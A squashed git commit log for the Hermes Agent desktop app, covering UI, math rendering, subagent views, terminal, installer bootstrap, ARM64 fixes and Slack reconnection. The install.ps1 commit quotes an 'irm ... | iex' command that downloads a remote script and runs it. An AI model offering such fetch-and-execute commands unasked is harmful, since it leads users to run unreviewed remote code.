+ optional `contentClassName` prop on ModelPickerDialog so the
dialog can be stacked on top of other fixed overlays
Tested
- `npm run type-check` passes
- `npx eslint` clean on touched files
- Live test in `npm run dev`: cleared onboarding cache, walked
through Nous device-code flow, saw confirm card with curated
default, clicked Change → ModelPickerDialog rendered above the
onboarding overlay with working pointer events, picked a different
model, "Start chatting" persisted to ~/.hermes/config.yaml.
* fix(desktop): suppress generic provider warning in onboarding
Hide the red setup notice when the message is the generic missing-provider guidance, since onboarding already presents provider auth actions. Centralize provider-setup matching across desktop hooks and add coverage for the matcher.
* fix(desktop): add 2u clearance below prereq checkboxes
Group box bottom border was clipping the checkboxes by 1-2px.
Bumped each box height 26u→30u; checkboxes now sit 2u above the bottom border.
* fix(nix): refresh dashboard lockfile hash
Update the web npm deps hash in nix/web.nix to match the committed apps/dashboard/package-lock.json so bb/gui passes the nix lockfile check.
* fix(desktop): install TUI deps in release workflow
Ensure desktop release builds install the standalone ui-tui package before bundling the TUI payload.
* fix(desktop): run release builder from app package
Invoke the desktop builder through the package script so electron-builder uses apps/desktop/package.json.
* fix(desktop): expand release artifact names safely
Build desktop artifact names from workflow version/channel while preserving electron-builder platform macros.
* fix(desktop): use package artifact naming in release workflow
Let electron-builder's desktop package config provide platform-specific artifact extensions while the workflow injects the release version/channel metadata.
* fix(nix): fetch dashboard npm deps from package root
Point the dashboard npm dependency fetch at apps/dashboard so Nix can find the package lockfile after the dashboard move.
* fix(nix): build dashboard from package directory
Set the web package source root to apps/dashboard so npm patch/build phases run beside the dashboard lockfile while keeping apps/shared available as a sibling.
* feat(desktop): render LaTeX math via KaTeX after streaming completes
Add @streamdown/math plugin to the chat markdown renderer.
Inline ($x^2$) and block ($$...$$) math both supported with
singleDollarTextMath enabled. Plugin is gated to non-streaming state
to match the existing pattern for syntax highlighting — math renders
when the message completes, avoiding KaTeX re-render churn during
streaming. KaTeX CSS is imported in styles.css; ~30KB CSS + ~430KB
JS added to the bundle. Smoothness improvements during streaming
deferred to a follow-up.
* perf(desktop): memoize KaTeX renders so math streams without re-rendering
Wrap rehype-katex with a per-equation LRU cache (keyed by
displayMode + source text) and re-enable math during streaming.
Stock @streamdown/math runs rehype-katex on every markdown commit,
so each new token re-katexes every equation in the message. For
math-heavy responses (an equation derived step-by-step) that's
hundreds of ms of wasted work per token and the streaming UI
chokes. With memoization, each equation pays katex.renderToString
exactly once; subsequent tokens re-walk the tree but hit cache for
unchanged equations.
The wrapper mirrors rehype-katex's semantics exactly: same class
detection (language-math, math-inline, math-display), same
<pre>-walk-up for fenced math blocks, same parent.children.splice
replacement, same SKIP traversal, same strict-then-lenient render
strategy with VFile message reporting.
Cached children are structuredCloned on each splice so downstream
rehype plugins or toJsxRuntime can't mutate the cache.
* fix(desktop): declare katex-memo deps directly + drop per-app lockfile
katex-memo.ts (added in 112cad59b) imports hast-util-from-html-isomorphic,
hast-util-to-text, remark-math, katex, and unist-util-visit-parents but
those were never added to apps/desktop/package.json. They were silently
resolving via @streamdown/math at the workspace root, which broke the
moment `npm i --prefix apps/desktop` ran with the per-workspace lockfile
because that install only consults apps/desktop/package.json. Add them
as direct deps, plus unified/vfile/@types/hast for the type imports.
Also delete apps/desktop/package-lock.json — root package.json declares
workspaces: ["apps/*"], so npm manages all lockfile state at the root.
The stale per-app lockfile is what made `npm i --prefix apps/desktop`
diverge from the workspace install in the first place and left an empty
apps/desktop/node_modules/@assistant-ui/ stub that Vite's dep optimizer
then tried (and failed) to open at @assistant-ui/core/dist/internal.js.
* feat(desktop): disable Backdrop noise overlay by default
The noise overlay defaulted to on, which adds a busy speckle layer over
the whole window for every new user. Flip the Leva default to off; the
toggle stays in Backdrop / Noise for anyone who wants it back.
* fix(desktop): polish LaTeX rendering — currency, code blocks, brackets
Five distinct bugs surfaced from a math-heavy stress test:
1. Adjacent code fences glued together. scrubBacktickNoise's
second-pass regex /``\s*``/g matched the LAST 2 backticks of
one fence + whitespace + FIRST 2 backticks of the next, collapsing
two blocks into one. Fixed with lookbehind/lookahead so we only
match exactly 2 backticks not part of a longer run.
2. Whitespace eaten between fences and following content.
stripPreviewTargets internally calls .trim() which strips leading/
trailing whitespace from each split-segment. For segments between
two fences this collapsed \n\n to '', gluing fence close to next
block. Fixed by capturing leading/trailing whitespace at the call
site and restoring it after the transform.
3. Currency dollar signs eaten as math. With singleDollarTextMath:true
remark-math greedy-matched any pair of $, so '$5 ... $10' became
one inline math span. Added escapeCurrencyDollars to escape $<digit>
patterns to \$<digit> in prose segments (not in code). Trade-off:
math expressions starting with a digit (rare — '$5x = 10$') get
escaped too. Mirrors the convention in ChatGPT/Claude's UIs.
4. \(...\) and \[...\] LaTeX brackets unsupported. Models often
emit these instead of $...$ / $$...$$. Added
rewriteLatexBracketDelimiters preprocessor pass.
5. ```latex / ```tex blocks were being routed to KaTeX via a
rewrite to ```math. Aligns with GitHub markdown convention:
```math = render as math; ```latex / ```tex = LaTeX/TeX
source code (syntax highlighted, not rendered). Conflating them
broke teaching/showing-source use cases. MATH_FENCE_LANGUAGES
pruned to {'math'} only.
Also flipped parseIncompleteMarkdown to true (was !isStreaming) so
the math parser can't see $ inside streaming-but-not-yet-closed code
fences. Shiki was already deferred via defer={isStreaming} so this
doesn't introduce new tokenization cost.
Test: 18/18 existing tests still pass; one test updated to expect
escaped \$ in currency-prose-with-URL case.
* fix(desktop): detect Python via registry/filesystem; pin to 3.11–3.13
Two related fixes for Python detection on Windows:
1. py.exe (Python launcher) is missing from per-user installs that
didn't check the launcher option, so 'py -3.X --version' alone
misses real Python installs. User-reported case: clean Win11 +
official Python.org 3.14 install -> 'where py' returned nothing,
our installer offered to install Python again. Both NSIS prereq
page and main.cjs now probe in this order:
1. py.exe launcher (when present)
2. PEP 514 registry: HKLM/HKCU\SOFTWARE\Python\PythonCore\<v>\InstallPath
3. Filesystem: %ProgramFiles%\Python<v>, %LocalAppData%\Programs\Python\Python<v>
Crucially, we never fall back to running 'python.exe' from PATH
on Windows — the WindowsApps stub at %LOCALAPPDATA%\Microsoft\
WindowsApps\python.exe is a redirector that opens the Microsoft
Store window if no Store Python is installed. Triggering that
during boot would be terrible UX. Registry/filesystem probes
never execute the binary.
2. Drop 3.14 from the supported version set. Several Hermes deps
(notably pywinpty, which carries Rust crates like
windows_x86_64_msvc) don't yet publish 3.14 wheels. With wheels
missing, 'pip install -e .' falls back to building from sdist,
which needs a Rust toolchain — users see 'could not compile
windows_x86_64_msvc build script' on first run. install.ps1
sidesteps this by pinning to 3.11 via uv; the desktop installer
doesn't yet have the same uv-managed-Python pathway, so for now
we accept 3.11/3.12/3.13 and tell winget to install 3.11 if
none of those are present. Revisit when the wheel ecosystem
catches up to 3.14 (~early 2026).
* feat(desktop): Cron, Profiles, usage analytics, and titlebar fixes
- Add Cron and Profiles sidebar routes with full CRUD-style flows and API wiring.
- Extend Command Center with auxiliary task overrides and a Usage panel (7d/30d/90d).
- Fix titlebar geometry for WSL/Windows (native overlay width, tool spacing).
- Remove stray merge conflict markers from pyproject.toml optional deps.
Co-authored-by: Cursor <cursoragent@cursor.com>
* fix(title-bar): position sidebar toggle button
* feat(desktop): composer queue — queue many, edit/delete/cancel-edit, Cursor-style
Press Enter while busy with a draft to queue it; with no draft to interrupt
and send the next queued turn. Auto-drains one queued turn each time the
session settles, same as Cursor. Queue persists across reloads so an
interrupted-and-queued turn isn't lost on refresh.
Each queued row supports edit-in-composer (with explicit Save/Cancel),
send-now (↑), and delete. Drain skips only the entry currently being
edited so the rest of the queue keeps flowing.
Queue dequeue is transactional — an entry only leaves the queue after
`prompt.submit` is accepted, so a rejected submit doesn't drop the turn.
Also shrinks the `[interrupted]` marker to a muted one-liner and drops
its assistant footer so it stops looking like a real reply.
* fix(desktop): handle empty usage analytics totals
Co-authored-by: Cursor <cursoragent@cursor.com>
* fix(desktop): address PR review titlebar and usage races
Co-authored-by: Cursor <cursoragent@cursor.com>
* feat(desktop): add MCP settings and live subagent tree
Surface configured MCP servers in Settings with JSON edit/save and a gateway-backed reload action so users can manage tool servers without falling back to slash commands.
Track live subagent gateway events in a desktop store, show active subagent counts in the Agents statusbar item, and replace the Agents overlay stub with a live spawn tree for the active session.
* fix(desktop): move power-user views out of sidebar
Keep Cron and Profiles available through lower-prominence chrome entry points so the workspace sidebar stays focused on core chat navigation.
Co-authored-by: Cursor <cursoragent@cursor.com>
* refactor(desktop): subagent overlay reads like a live transcript, not a dashboard
Strip the card chrome and rewire /agents to feel like peeking into the
child agent's stream:
- subagents store: single `stream` of typed entries (thinking/tool/progress/
summary) replaces the parallel notes/thinking/tools arrays. Drop unused
fields (toolsets, depth, apiCalls, reasoningTokens, sessionId).
- agents view: no OverlayCards, no boxed stream, no per-row borders. Goal +
status pill + indented stream lines, full row width.
- Group root spawns into "Delegation N" sections when batch shape + spawn
time match — hides task-index interleaving and makes hierarchy obvious.
- Sort tree by spawn time, then task_index. Step indicator is one colored
pill (primary while running, emerald when done) inside the row, not a
trailing pill that wrapped under the chevron.
- Tree picks up `subagent.start` (not only `spawn_requested`) and prunes
delegate-tool fallback rows once native subagent events land for the
session — fixes duplicate "Delegated task" rows alongside the real ones.
* feat(desktop): Esc closes every OverlayView-based overlay
Lift the keyboard handler into the shared OverlayView so Agents, Settings,
Command Center — and anything we build on top of it later — all dismiss on
Esc by default. Nested Radix dialogs stop propagation themselves, so a
modal opened inside an overlay (e.g. model picker inside Settings) still
closes the modal first, not the overlay underneath.
Drop the now-redundant Esc handlers in Settings (kept Cmd/Ctrl+P) and
Command Center.
* fix(desktop): drop numbered step pill on subagent rows
The pill was getting clipped at the overlay edge anyway. Just use the
status glyph (●/✓/✗/■/○) — the delegation header already conveys
"3 workers, 3 active", and order in the list implies which step you're
looking at.
* fix(desktop): drop noisy "returned N items / empty object" stub strings
When a tool returns nothing useful, the row should be silent — the title
("Search Files", etc.) already tells the user what happened. Counting the
fields in an opaque payload is engineer-noise.
`formatToolResultSummary` and `minimalValueSummary` now return '' for
empty arrays / records / unrecognized values; tool-fallback already hides
the detail section when its body is empty.
* refactor(desktop): subagent rows borrow chat tool patterns (fade-in, lucide glyphs, shimmer)
Pull the agents view closer to how chat tool blocks render:
- statusGlyph() returns the same lucide BrailleSpinner / CheckCircle2 /
AlertCircle vocabulary as tool-fallback's statusGlyph
- Stream lines fade-in via useEnterAnimation (one-shot WAAPI), keyed per
entry so streamed deltas settle in instead of popping
- Subagent rows fade in too, and pick up the existing data-slot=tool-block
spacing rules between blocks
- Active stream line trails a BrailleSpinner instead of a hand-rolled
pulsing rectangle
- Goal text drops FadeText (which forces nowrap); keep FadeText only for
the single-line meta subtitle
- Running rows shimmer the title — same affordance the chat thinking row
uses
* refactor(desktop): make /agents subagent-only, drop sidebar + dead sections
Activity rail and History stub were both noise. Strip the split layout,
sidebar, route enum, and the rail/stub helpers — the overlay is now just
the spawn tree, centered in a max-w-3xl column so it stops claiming the
whole screen for one section's worth of content.
* feat: update cron modals
* Add dedicated GUI log stream for dashboard debugging.
Capture dashboard and PTY websocket lifecycle failures in gui.log and expose it via hermes logs.
* Improve desktop runtime UX by surfacing inference readiness in gateway status and hardening WSL link opening.
This also stabilizes markdown code/table block spacing and adds root-install guards so desktop dev runs use a healthy workspace dependency tree.
* Log detailed GUI websocket failure metadata.
Capture richer reject/disconnect/send/parse context for dashboard gateway websocket flows so GUI connection failures are diagnosable from logs.
* Default dashboard startup logging to GUI mode.
Detect the dashboard subcommand during early CLI bootstrap so gui.log is attached from process start and GUI startup failures are always captured.
* Clean up gateway status conditionals and logging bootstrap mode detection.
Simplify nested dashboard gateway status branches for readability and use a concise first-subcommand check when selecting early GUI logging mode.
* add logging to nsis installer
* feat: glass ui pass
* fix(desktop): persist inline assistant errors across hydrate/resume
- Detect provider failure text arriving via message.complete
(HTTP 4xx, "API call failed after N retries", Provider/Gateway
error: ...) and persist as an inline assistant error instead of
regular completion text, blocking the hydrate that was wiping it.
- preserveLocalAssistantErrors: merge by id so same-id hydrated
messages keep their local error, and preserve the optimistic
user+error pair as a unit (with tail-user dedupe).
- Hook all hydrate/resume writers (use-session-actions resume +
fallback, hydrateFromStoredSession, syncSessionStateToView) into
the merge so stale snapshots can't clobber a failed turn.
- Add error to chatMessagesEquivalent so the resume diff actually
sees error-only changes and paints them.
- editMessage on a failed turn now submits a plain resend (no
truncate_before_user_ordinal) and retries plainly on the
"no longer in session history" race.
Style polish on touched files:
- Inline error: text-only treatment (no card).
- User stop / edit-composer send: shared Tabler IconPlayerStopFilled
glyph + shared icon-button class slot for parity.
* feat(desktop): theme xterm with active light/dark mode
The right-sidebar terminal hardcoded a light palette, which read poorly
on the dark glass surface. Subscribe to `useTheme().resolvedMode` and
hot-swap `term.options.theme` so Shift+X (and any other mode change)
updates the terminal in place without tearing down the PTY session.
Dark mode uses xterm's built-in defaults (white fg/cursor + vivid ANSI
16) with just a transparent background so the glass shows through;
light mode keeps the existing hand-tuned overrides for legibility on a
bright surface.
* feat(sidebar): right-click + drag-reorder sessions and workspaces
- Wire right-click on session rows to open the same actions menu;
suppresses the OS-native context menu so Windows stops looking awful.
- Share dropdown + context menu items via useSessionActions() driving
a single declarative ItemSpec[]; render polymorphic over MenuItem.
- New shadcn ContextMenu primitive mirroring DropdownMenu styling.
- Restore drag-and-drop reordering for Agents (lost during the cwd
cleanup) and add reordering of workspace groups via a right-side
grab handle. Pinned reorder unchanged.
- Generic orderByIds<T> replaces the duplicated session/group orderers;
useSortableBindings() hook collapses the two Sortable wrappers.
- cursor-pointer on every actionable element; cursor-grab on handles.
- KISS pass: baseName() helper, AGE_TICKS table, single WORKSPACE_PAGE
constant, flatter SidebarSessionsSection render.
* feat(desktop): solarize the xterm palette in both light & dark
xterm's default ANSI 16 is tuned for dark and reads candy-bright on the
light glass surface (vivid cyans/greens). Ship the canonical Solarized
palette (Schoonover) for both modes — same 16 accents either way, only
fg/cursor swap between `base00/01` (light) and `base0/1` (dark), so a
prompt's colors look uniform across a Shift+X toggle.
Background stays transparent in both modes — Solarized's cream/slate
backgrounds would fight the glass.
* feat(desktop): virtualize chat thread + sidebar via TanStack Virtual
Replaces `use-stick-to-bottom` and per-row session rendering with
`@tanstack/react-virtual`, matching what Cursor uses.
Chat thread (`thread-virtualizer.tsx`):
- Natural-flow virtualization (padding spacers, not absolute items) so
`position: sticky` on the human bubble still resolves cleanly against
the scroller.
- Custom at-bottom anchor: pins when armed, disarms on user-driven
upward scroll, re-arms at bottom, jumps on session switch +
`thread.runStart`.
- Loading indicator and `--thread-last-message-clearance` move to a
real `[data-slot=aui_composer-clearance]` node; drops the brittle
`:nth-last-child(1 of …)` rule that can't fire reliably under
virtualization.
Sidebar (`virtual-session-list.tsx`):
- Flat agents list virtualizes at >=25 rows; pinned and
workspace-grouped paths stay direct-render.
- `SortableContext` keeps all IDs; only the window mounts; dnd-kit's
`setNodeRef` is merged with `virtualizer.measureElement` so rows
participate in both DnD hit-testing and TanStack measurement.
Drops `use-stick-to-bottom`. Streaming test gets a global
`offsetWidth/offsetHeight` stub so the virtualizer's viewport sizing
works in jsdom; the scroll-up-doesn't-pull-back invariant still passes.
* feat: more ui qa
* fix(desktop): trim sidebar terminal startup spacer
Drop zsh's initial spacer row before writing the first terminal prompt so new sidebar terminal sessions do not open with a selectable blank line.
* chore: uptick
* feat(desktop): thin installer + first-launch install.ps1 bootstrap
Converges the Windows packaged desktop installer onto a single canonical
install topology: drop the Electron shell only (~80MB instead of ~500MB),
clone Hermes Agent at a build-time-pinned commit on first launch via
install.ps1's stage protocol, and treat the resulting git checkout at
%LOCALAPPDATA%\hermes\hermes-agent\ as the canonical install location
(same path the CLI installer uses). Future updates flow through the
existing applyUpdates() git-pull path.
Replaces the previous fat-installer architecture where the .exe bundled
a pre-staged hermes-agent source tree under resources/hermes-agent/ that
was then sync'd into ACTIVE_HERMES_ROOT at launch -- a complicated
factory-vs-active dance with several footguns (FACTORY_HERMES_ROOT
mismatch on path resolve, isGitCheckout guard regressions, pyproject
hash drift detection inside the sync loop).
Architecture overview
---------------------
Build time
apps/desktop/scripts/write-build-stamp.cjs writes
apps/desktop/build/install-stamp.json with {commit, branch, builtAt,
dirty}. Honours $GITHUB_SHA / $GITHUB_REF_NAME in CI, falls back to
`git rev-parse HEAD` locally.
apps/desktop/scripts/stage-native-deps.cjs copies the runtime subset
of @homebridge/node-pty-prebuilt-multiarch from the workspace-root
node_modules into apps/desktop/build/native-deps/. Workspace dedup
hoists this dep to the root, out of reach of electron-builder's
`files:`-restricted collector; staging gives us a deterministic
path to extraResources.
electron-builder ships both into resources/install-stamp.json and
resources/native-deps/ respectively.
Boot resolver (electron/main.cjs)
Resolver order:
1. HERMES_DESKTOP_HERMES_ROOT override
2. SOURCE_REPO_ROOT (dev mode)
3. ACTIVE_HERMES_ROOT git checkout WITH .hermes-bootstrap-complete
marker -- the post-install fast path
4. `hermes` on PATH (CLI-installed user adding the desktop)
5. pip-installed hermes_cli via system Python
6. bootstrap-needed sentinel -> hand off to runBootstrap
Deletes the entire FACTORY_HERMES_ROOT / RUNTIME_MARKER /
syncTreeExcludingVenv machinery (-200 lines). The isGitCheckout
guard that bit us in the install.ps1 PR is gone.
First-launch bootstrap (electron/bootstrap-runner.cjs)
1. Resolve install.ps1: prefer SOURCE_REPO_ROOT/scripts (dev), else
download from GitHub raw at INSTALL_STAMP.commit (cached at
HERMES_HOME\bootstrap-cache\install-<sha>.ps1).
2. Fetch the stage manifest via install.ps1 -Manifest -Commit X
-Branch Y.
3. Iterate stages: install.ps1 -Stage <name> -NonInteractive -Json
-Commit X -Branch Y per stage.
4. On all stages green: write the .hermes-bootstrap-complete
marker with {schemaVersion, pinnedCommit, pinnedBranch,
completedAt, desktopVersion}.
Per-run log to HERMES_HOME\logs\bootstrap-<ts>.log. Cancellation
via AbortSignal. Manifest cache so retries don't re-download.
Install overlay (src/components/desktop-install-overlay.tsx)
Mounted alongside the existing onboarding overlay; flexbox card
with header (static) + middle (scrollable) + footer (failure-only,
static). Subscribes to hermes:bootstrap:event IPC + resyncs from
hermes:bootstrap:get on mount/reload. Renders:
- 14-stage checklist with per-stage state icons
- Overall progress bar + current-stage spotlight
- Auto-expanded installer-output panel on failure
- "Copy output" button (full ring buffer + error to clipboard)
- "Reload and retry" wired through hermes:bootstrap:reset to
clear main.cjs's latched failure
Synthetic empty-manifest event from main.cjs flips the overlay to
'active' immediately so the slow install.ps1 download doesn't
leave the user staring at the generic Preparing splash.
Failure latching (main.cjs)
bootstrapFailure module-scope variable holds the rejection after
install.ps1 fails. startHermes() throws the latched error
immediately when set, bypassing the entire ensureRuntime +
runBootstrap chain. Without this, the renderer's ensureGatewayOpen
retries would re-run install.ps1 in a 5-10 min hot loop while the
user was still reading the failure overlay. Cleared via
hermes:bootstrap:reset on user-driven retry.
Unsupported-platform overlay (1F)
macOS / Linux packaged builds (no install.sh stage protocol yet)
emit an unsupported-platform event with a copy-pasteable install
command + docs URL. Dedicated overlay branch with "Copy command"
+ "I've run it -- retry" buttons.
install.ps1 additions (Phase 1F.3 + 1F.5)
-----------------------------------------
New -Commit and -Tag string params. Precedence Commit > Tag >
Branch. Honoured by all three code paths (update / fresh clone /
ZIP fallback), with archive URL selection that handles each
ref-type variant. Detached-HEAD checkouts intentionally -- they're
pins, not branches the user pulls into.
EAP=Continue wrap around the new pin-step git invocations. `git
fetch origin <commit>` writes the routine 'From <url>' info line to
stderr; under the script's global EAP=Stop that terminates the
script even though fetch+checkout succeed. Matches the established
pattern in Install-Uv, Test-Python, _Run-NpmInstall.
Backend fix (hermes_cli/web_server.py)
--------------------------------------
CORS allow_origin_regex now accepts Origin: 'null'. Packaged
Electron loads index.html via file://; Chromium sets the WebSocket
upgrade Origin header to the opaque origin 'null', which the old
regex rejected with HTTP 403 before gateway_ws() ever ran. This
failure mode was masked in the older FACTORY_HERMES_ROOT
architecture because the resolver often found an existing hermes
on PATH with different binding behavior.
Security maintained: localhost-only bind keeps cross-machine pages
out; per-process session token still gates every authenticated
/api/ endpoint regardless of Origin.
Desktop QoL
-----------
DevTools is now enabled in packaged builds (F12 / Cmd+Opt+I).
Field-debugging trade-off: tiny attack surface increase versus
a much better support story when CSP / WS / theme issues surface.
NSIS prereq-check page deleted (-767 lines). The standard
Welcome -> License -> Directory -> InstallFiles -> Finish wizard
now installs without custom Python/Git/ripgrep detection -- those
prereqs are install.ps1's job at first launch.
Test infrastructure (Phase 1G)
------------------------------
apps/desktop/scripts/test-desktop.mjs rewritten as a cross-platform
bundle validator (was darwin-only and asserted on dead factory-
payload paths):
NEGATIVE: hermes_cli/main.py is NOT shipped (regression guard)
POSITIVE: install-stamp.json carries a real commit + branch
POSITIVE: node-pty native deps shipped under resources/native-deps
POSITIVE: renderer dist/index.html reachable (asar or unpacked)
New nsis mode and npm run test:desktop:nsis script.
Validated end-to-end on clean Win10 VM
--------------------------------------
Confirmed: NSIS installer drops Electron shell, app launches,
install overlay shows progress, install.ps1 clones the pinned
commit, 14 stages run to completion, marker written, backend
spawns, WebSocket connects, onboarding overlay asks for API key,
main UI loads, integrated terminal works.
Failures handled: bootstrap stays failed (no hot-loop retry),
"Copy output" gives actionable transcript, "Reload and retry"
explicitly re-runs install.ps1.
What's deferred
---------------
- MSIX wrapping (Phase 2): same Electron .exe under MSIX manifest
with runFullTrust, signed and submitted to Microsoft Store.
- install.sh stage protocol parity (Phase 2): once shipped, the
unsupported-platform overlay becomes drive-it-yourself and
macOS/Linux packaged installers gain feature parity with Windows.
* feat(desktop): persistent terminal pane + fullscreen takeover
Adds a VSCode-style "focus terminal" toggle to the right sidebar's Terminal
tab that takes over the chat pane area without unmounting the shell. The
xterm host is mounted once at the layout root and CSS-overlayed onto
whichever <TerminalSlot /> is currently active, so the PTY session,
scrollback, selection, focus, and WebGL renderer survive every toggle.
Also:
- WebGL renderer (matching dashboard ChatPage) so Hermes' TUI skins paint
faithfully instead of muting through xterm's default DOM renderer
- File drag/drop from the project tree or OS into xterm — paths are
shell-quoted (zsh/bash/pwsh/cmd) and written straight into the PTY
- Solarized dark canvas with brights promoted to real accent variants
(Schoonover's UI-gray brights washed out every TUI accent)
- Strip NO_COLOR/FORCE_COLOR/COLORFGBG/TERM=dumb leaking from non-tty
parents (CI runners, Cursor's agent shell) so the embedded shell gets
truecolor regardless of how Electron was launched
- rAF-debounced ResizeObserver — running fit.fit() synchronously during
sibling pane transitions crashed the WebGL texture-atlas rebuild
* fix(install.ps1): strip UTF-8 BOM regression that broke 'irm | iex'
The canonical install flow
irm https://raw.githubusercontent.com/.../scripts/install.ps1 | iex
fails on PowerShell 5.1 with a cascade of 'The assignment expression
is not valid' errors at every param() default value:
[string]$Branch = 'main',
~~~~~~
The assignment expression is not valid. The input to an assignment
operator must be an object that is able to accept assignments...
Root cause: scripts/install.ps1 carries a UTF-8 BOM (0xEF 0xBB 0xBF)
as its first three bytes. 'irm' returns the response body as a string;
on PS 5.1 the BOM survives into that string as a leading \ufeff
character. 'iex' then evaluates the string and PS's parser chokes
on the invisible character before param() -- error recovery proceeds
into the body but every assignment is reported as broken.
This was the exact failure mode the install.ps1 hardening pass (PR
#27224) deliberately fixed by stripping the BOM and ensuring the
file body is pure ASCII. Commit 4279da4db ('fix(windows): make
PowerShell installer parse in 5.1') re-introduced the BOM later,
unintentionally undoing the irm|iex compatibility fix; the merge
that brought it into bb/gui carried it forward.
Fix: strip the three BOM bytes. File body is verified pure ASCII
(any-byte > 127 returns false), so PS 5.1 with no BOM falls back to
Windows-1252 decoding which is identical to ASCII for our content.
Both install paths now work:
- 'irm ... | iex' (canonical CLI)
- 'powershell -File install.ps1' (programmatic / desktop bootstrap)
* install.ps1: detect ARM64 Windows reliably for Node and Git stages
Add a Get-WindowsArch helper that reads Win32_Processor.Architecture
via CIM (invariant to PowerShell host bitness) with PROCESSOR_ARCHITEW6432
fallback. Use it in:
- Install-Git: previously only triggered the arm64 PortableGit asset
when invoked from a native-ARM64 PowerShell host. WoW64 / emulated
x64 hosts (the default powershell.exe on Windows-on-ARM) saw
PROCESSOR_ARCHITECTURE=AMD64 and fell through to the x64 PortableGit
build, leaving ARM64 users on emulated Git for Windows.
- Test-Node: previously hardcoded the Node download to win-x64 on any
64-bit OS, so ARM64 users always got x64 Node under Prism emulation
even though Node ships an arm64 build for Windows. The winget
fallback now also passes --architecture arm64 on ARM64.
Python remains x86_64 by design: uv intentionally prefers
windows-x86_64 cpython on ARM64 hosts for ecosystem (wheel)
compatibility (see astral-sh/uv#19015).
* install.ps1: harden Install-SystemPackages against winget msstore failures
The previous winget invocation discarded stdout/stderr and trusted no
signal at all -- not the exit code (winget exits 0 even when it bails
"please specify --source"), not output (sent to Out-Null), not the
catch handler (winget returning 0 means no exception fires). The only
trust signal was a post-install Get-Command rg / Get-Command ffmpeg
check, which would also miss the package because %LOCALAPPDATA%\
Microsoft\WinGet\Links (where winget puts command aliases) is added to
PATH by AppExecutionAlias machinery only in fresh shells. End result on
machines where the msstore source has a cert problem (0x8a15005e --
common on Windows-on-ARM and some corporate networks): silent failure,
no log, no breadcrumb, and the user is told the install succeeded.
Specifically:
- Pin --source winget on every winget install call. Defeats the broken-
msstore-source path. We ship nothing from msstore so this is safe and
forward-compatible.
- Add --exact --id for a tighter package match.
- Capture each winget invocation's combined stdout/stderr + exit code to
%TEMP%\hermes-winget-<pkg>-<n>.log instead of Out-Null. On the happy
path the log is deleted after the post-install check confirms the
binary is on PATH; on failure the log is kept and its path is named in
a Write-Warn so the user has something to grep.
- Refresh PATH to include %LOCALAPPDATA%\Microsoft\WinGet\Links in
addition to the User/Machine env-var hives, so Get-Command sees newly-
installed winget aliases in the same process.
- No behavior change on the happy path. Same Write-Info/Success/Warn
cadence, same fallback order (winget -> choco -> scoop -> manual),
same $script:HasRipgrep / $script:HasFfmpeg outputs.
Verified end-to-end on a real Snapdragon ARM64 Windows host: ripgrep
uninstalled, stage re-run, [OK] ripgrep installed in 1.4s, ok:true.
* desktop: swap node-pty fork for upstream microsoft/node-pty 1.1.0
The previous dependency, @homebridge/node-pty-prebuilt-multiarch@0.13.1,
publishes no win32-arm64 prebuilds on its v0.13.x line, and its v0.14.x
betas (which do add an arm64 Windows build) ship no electron-vXXX-win32-
arm64 prebuilds at all -- so packaged Electron 40 builds (NMV 143) would
fail at runtime even on a successful npm install. Net effect: the
desktop's integrated terminal was unbuildable on Windows-on-ARM, in
both dev (npm install fails: 404 fetching the node-vXXX-win32-arm64
prebuilt) and packaged builds (no Electron-ABI prebuilt exists).
The homebridge fork was originally created because upstream node-pty
shipped no prebuilds at all. That hasn't been true since node-pty@1.0
(April 2024), which:
- bundles prebuilts for mac (arm64+x64) and Windows (arm64+x64) directly
inside the npm tarball -- no GitHub-Releases fetch, no missing-binary
failure mode
- uses N-API (node-addon-api) for ABI stability across Node and Electron
major versions, so the same pty.node binary loads under Node 22 (dev)
and Electron 40+ (packaged) without per-ABI rebuilds
- is what VS Code, Hyper, and Theia actually ship
API surface is identical (spawn / onData / onExit / write / resize /
kill) -- no call-site changes needed.
Specifically:
- apps/desktop/package.json: replace the @homebridge fork with
node-pty@1.1.0 (exact pin). Widen `asarUnpack` from `["**/*.node"]`
to also unpack `**/prebuilds/**`, because node-pty ships runtime-
execed helpers alongside its .node files (darwin spawn-helper has no
extension and would not be matched by `**/*.node`; conpty.dll,
OpenConsole.exe, winpty.dll, winpty-agent.exe on Windows are also
exec'd at runtime and cannot live inside asar).
- apps/desktop/electron/main.cjs: update both require() strings to
match the new package name and the new staged path under
resources/native-deps/node-pty/.
- apps/desktop/scripts/stage-native-deps.cjs: point at node_modules/
node-pty. node-pty's prebuilts live under prebuilds/<plat>-<arch>/
(not build/Release/), so update the include glob to copy that dir.
Per-arch staging keeps the resource bundle small (target arch comes
from npm_config_arch when electron-builder cross-builds, else
process.arch). Explicitly enumerate file types in the prebuilds glob
so the ~25 MB of .pdb debug symbols that prebuild-install bundles
for Windows crash analysis don't bloat the installer (29 MB -> 2.6 MB
staged on win32-arm64). Re-assert +x on the darwin spawn-helper
defensively, since a stripped mode bit would manifest as a silent
ENOENT at first pty.spawn().
- apps/desktop/scripts/test-desktop.mjs: update expectedNativeDepPaths()
and its assertion site to look at prebuilds/<plat>-<arch>/ instead of
build/Release/. Add an explicit spawn-helper-exists check on darwin
so a regression in the asarUnpack glob would fail loudly in CI rather
than at first PTY spawn.
Trade-off: Linux end-users lose prebuilts and fall back to building
node-pty from source on `npm install`. Acceptable because Hermes
ships no Linux desktop builds (desktop-release.yml matrix is mac + win
only, package.json declares no `linux` target), and Linux developers
hacking on the desktop already need a C++ toolchain for the rest of
the stack.
Verified on Windows 11 ARM64 (Snapdragon):
npm install -> exit 0
node -e "require('node-pty').spawn(...)" round-trip -> OK
stage-native-deps -> 27 files, 2.6 MB
load from staged tree (simulates packaged fallback) -> ConPTY
round-trip OK
* desktop+gateway: harden Slack socket recovery and Windows restart dedupe (#28873)
* desktop+gateway: harden Slack socket recovery and Windows restart dedupe
Fix Slack Socket Mode reliability by adding a watchdog/reconnect path so silent socket task drops no longer leave the adapter stuck. Harden Windows gateway lifecycle by avoiding desktop-binary path collisions, making gateway PID scans case/extension tolerant, and reusing in-flight restart actions to prevent duplicate gateway spawns.
* test(slack): add Socket Mode watchdog/reconnect behavioural coverage
Drive the new Slack Socket Mode self-healing logic through a fake AsyncSocketModeHandler so we can simulate the P0 silent-hang failure mode (task exit, transport disconnected, intentional shutdown, concurrent reconnect attempts) without touching real Slack.
* fix(slack,desktop): address Copilot review on watchdog races and path normalization
- connect(): explicitly cancel + await the prior socket watchdog before flipping _running, so an old monitor cannot exit between teardown and respawn (Copilot #1)
